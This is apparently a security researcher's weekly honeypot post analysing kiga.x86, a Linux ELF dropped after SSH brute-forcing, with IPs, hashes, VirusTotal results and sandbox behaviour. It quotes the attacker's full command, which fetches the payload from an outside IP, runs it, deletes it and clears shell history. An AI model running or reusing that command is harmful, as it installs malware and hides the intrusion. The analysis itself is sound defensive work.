In addition to my weekly threat intel report, I’ll highlight a file/executable/exploit attempt seen in the last week.  I’ll do some basic file analysis to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at kiga.x86. Using various username and password combinations, an IP address from Russia attempted to login to my ssh honeypot 640 times. I allow the username root with any password, which they used to successfully authenticate 15 times.  When logged in, the bot issued one command, which fetched their payload(kiga.x86), made sure it was executable, ran it, removed the payload from the machine and cleared the cli history. Kiga.x86 is a linux executable, that doesn’t give us much info about it’s behavior at first glance. Based on execution analysis, it appears to remove and execute programs in the /tmp folder. It could be used to clear other droppers and make sure it’s payloads are being executed.

Attacker Commands:
wget http://185[dot]172[dot]110[dot]214/AB4g5/kiga[dot]x86; chmod 777 *; ./kiga[dot]x86 Roots;rm -rf kiga[dot]x86; history -c

Filename: kiga.x86
Timestamp: 2020-06-14 05:11PM PST
Initiating Source IP: 93.157.62.102
Downloaded from: http://185[dot]172[dot]110[dot]214/AB4g5/kiga.x86
SHA256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Virus Total Link: https://www.virustotal.com/gui/file/c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1/detection

File Contents:
file kiga.x86
kiga.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Initiating Source IP Analysis:

Analysis Date	2020-06-14 22:12:08
Elapsed Time	3 seconds
Blacklist Status	BLACKLISTED 28/114
IP Address	93.157.62.102 Find Sites | IP Whois
Reverse DNS	mta23.dealzania.site
ASN	AS43350
ASN Owner	NForce Entertainment B.V.
ISP	NFOrce Entertainment B.V.
Continent	Europe
Country Code	(RU) Russia
Latitude / Longitude	55.7386 / 37.6068 Google Map
City	Unknown
Region	Unknown

Download URL analysis:

Analysis Date	2020-06-14 22:13:10
Elapsed Time	16 seconds
Blacklist Status	BLACKLISTED 4/114
IP Address	185.172.110.214 Find Sites | IP Whois
Reverse DNS	Unknown
ASN	AS206898
ASN Owner	Server Hosting Pty Ltd
ISP	Server Hosting Pty Ltd
Continent	Europe
Country Code	(NL) Netherlands
Latitude / Longitude	52.3824 / 4.8995 Google Map
City	Unknown
Region	Unknown

Virus Total Stats:
As of 2020-06-14, 31/60 engines detect this file as malicious

Additional properties:
MD5        7b65dec7862e5fbde95fbeb33e10468b
SHA-1        ec2556fd8052d48376da56ce5abdb22ce12b557d
SHA-256        c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Vhash        7bb8336eb02c878841bb63e512d6698e
SSDEEP        1536:pvfI8quwTDx27izeXbcziMnEfzwTOEVz3kZIIxYaZH5H5b:1zquSDx22zeXbqEfz+OE5UKI2WHxh
File type        ELF
Magic        ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
File size        60.98 KB (62448 bytes)

ELF Info:
Header
Class        ELF32
Data        2’s complement, little endian
Header Version        1 (current)
OS ABI        UNIX – System V
Object File Type        EXEC (Executable file)
Required Architecture        Intel 80386
Object File Version        0x1
Program Headers        3
Section Headers        10

Windows Defender:

Example actions:
Processes Terminated
When executing the file being studied, the following processes were terminated.

• /tmp/EB93A6/996E.elf
• /lib/systemd/systemd-udevd –daemon

Tancent Analysis:

SHA256:	c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
File type:	ELF32

Process 

Behaviour:	Execute a file
Detail info:	execve: /tmp/bin/****.elf
Behaviour:	Process exit
Detail info:	procexit status=256 procexit status=136 procexit status=0

Network 

Behaviour:	connect
Detail info:	connect: 192.168.0.**:60869->8.8.8.8:domain
Behaviour:	socket
Detail info:	socket: domain=2(AF_INET) type=2 proto=0 socket: domain=2(AF_INET) type=1 proto=0